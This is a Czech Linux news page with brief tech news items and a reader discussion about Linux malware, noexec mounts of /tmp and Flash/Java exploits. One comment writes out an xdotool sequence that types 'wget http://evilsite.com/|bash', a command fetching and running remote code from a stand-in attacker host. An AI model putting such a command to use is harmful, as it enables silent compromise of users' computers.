Před necelými čtyřmi měsíci byl Steven Deobald jmenován novým výkonným ředitelem GNOME Foundation. Včera skončil, protože "nebyl pro tuto roli v tento čas ten pravý".
Nové číslo časopisu Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 156 (pdf).
Armbian, tj. linuxová distribuce založená na Debianu a Ubuntu optimalizovaná pro jednodeskové počítače na platformě ARM a RISC-V, ke stažení ale také pro Intel a AMD, byl vydán ve verzi 25.8.1. Přehled novinek v Changelogu.
Včera večer měl na YouTube premiéru dokumentární film Python: The Documentary | An origin story.
Společnost comma.ai po třech letech od vydání verze 0.9 vydala novou verzi 0.10 open source pokročilého asistenčního systému pro řidiče openpilot (Wikipedie). Zdrojové kódy jsou k dispozici na GitHubu.
Ubuntu nově pro testování nových verzí vydává měsíční snapshoty. Dnes vyšel 4. snapshot Ubuntu 25.10 (Questing Quokka).
Řada vestavěných počítačových desek a vývojových platforem NVIDIA Jetson se rozrostla o NVIDIA Jetson Thor. Ve srovnání se svým předchůdcem NVIDIA Jetson Orin nabízí 7,5krát vyšší výpočetní výkon umělé inteligence a 3,5krát vyšší energetickou účinnost. Softwarový stack NVIDIA JetPack 7 je založen na Ubuntu 24.04 LTS.
Národní úřad pro kybernetickou a informační bezpečnost (NÚKIB) spolu s NSA a dalšími americkými úřady upozorňuje (en) na čínského aktéra Salt Typhoon, který kompromituje sítě po celém světě.
Společnost Framework Computer představila (YouTube) nový výkonnější Framework Laptop 16. Rozhodnou se lze například pro procesor Ryzen AI 9 HX 370 a grafickou kartu NVIDIA GeForce RTX 5070.
Google oznamuje, že na „certifikovaných“ zařízeních s Androidem omezí instalaci aplikací (včetně „sideloadingu“) tak, že bude vyžadovat, aby aplikace byly podepsány centrálně registrovanými vývojáři s ověřenou identitou. Tato politika bude implementována během roku 2026 ve vybraných zemích (jihovýchodní Asie, Brazílie) a od roku 2027 celosvětově.
Zavirovaný počítač je vždy důvod ke smutku. Pokud se chcete takových starostí zbavit, můžete si pročíst openMagazin, který se tomuto tématu věnuje. Pak si můžete udělat přehled a např. si nainstalovat některou z distribucí Linuxu.
Hned v prvním článku tématického okruhu se dozvíte, co je to linuxová distribuce a které jsou oblíbené. V dalších článcích jsou rozebírána jednotlivá desktopová prostředí, jejich výhody a nevýhody.
OpenMagazin (můžete si ho stáhnout) vám ukáže, že Evropa se přiklání k open-source softwaru. I v České republice se najde mnoho škol, které ho používají. Začtěte se do článku o jedné z nich. Recenze na hru Minecraft vás naláká k využití chvil odpočinku právě s ní.
Děkujeme všem, kteří kopírují, sdílejí a rozesílají e-zin všem svým známým a přátelům. Lidé z Liberixu ho vytvářejí pro vás, čtenáře, a také díky vašim darům může vycházet.
Tiskni
Sdílej:
Pokud bankovnictví používá elektronický podpis, jiná možnost než nějaký plugin není.Takže já si stáhnu z webu internetbankingu applet, spustím ho, dám mu soukromý klíč a něco v něm podepíšu? Jaký to má smysl? Pokud je kompromitovaný web, bude kompromitovaný i stahovaný applet.
mrkva@destiny:~$ cd /tmp mrkva@destiny:/tmp$ su Heslo: root@destiny:/tmp# mkdir noexec root@destiny:/tmp# chmod 777 noexec/ root@destiny:/tmp# mount -t tmpfs tmpfs noexec/ -o noexec root@destiny:/tmp# exit mrkva@destiny:/tmp$ cd noexec mrkva@destiny:/tmp/noexec$ cp /usr/bin/id . mrkva@destiny:/tmp/noexec$ ./id bash: ./id: Permission denied mrkva@destiny:/tmp/noexec$ /lib64/ld-linux-x86-64.so.2 ./id ./id: error while loading shared libraries: ./id: failed to map segment from shared object: Operation not permitted
.bashrc
. Nebo zrovna tenhle konkrétní exploit je závislý na /tmp?
Když už útočník může zapisovat a spouštět kód z /tmp, tak může zapisovat taky třeba do .bashrc.Zajimalo by mne, co na to SELinux.
xdotool key Alt-F2 xdotool type xterm [RETURN] xdotool type "wget http://evilsite.com/|bash - ; logout"
I invoke.Tak takhle jsem se dlouho nenasmál
Ani já to nesleduju, ale řekl bych, že jeden ze zásadních rozdílů bude v poučenosti uživatelů různých platforem.To je. Ale pokud zmíněný OpenMagazin převede uživatele, kteří měli na Windows problém (a jsou tedy nepoučení) na Linux, jak si pomůžou?
Stejně tak jako v rozšířenosti Flashe zmíněného na různých platformách.Flash má i spousta linuxáků a dá se očekávat, že BFU přecházející z Windows ho bude chtít taky.
Flash? Java?Kdy byla naposledy ve Flashi nebo v Javě bezpečnostní chyba umožňující bez souhlasu uživatele spustit kód mimo pískoviště? Kolik takových chyb bylo celkem?
Flash? Java? 0day?
Mohl to být exploit na Flash nebo Javu nebo zeroday na Operu.V té první větě není nic o Opeře. V té druhé jste to sice rozepsal, ale pořád to nedává smysl. Myslel jste tedy tohle?
Mohl to být zero day exploit na Flash, Javu nebo na Operu.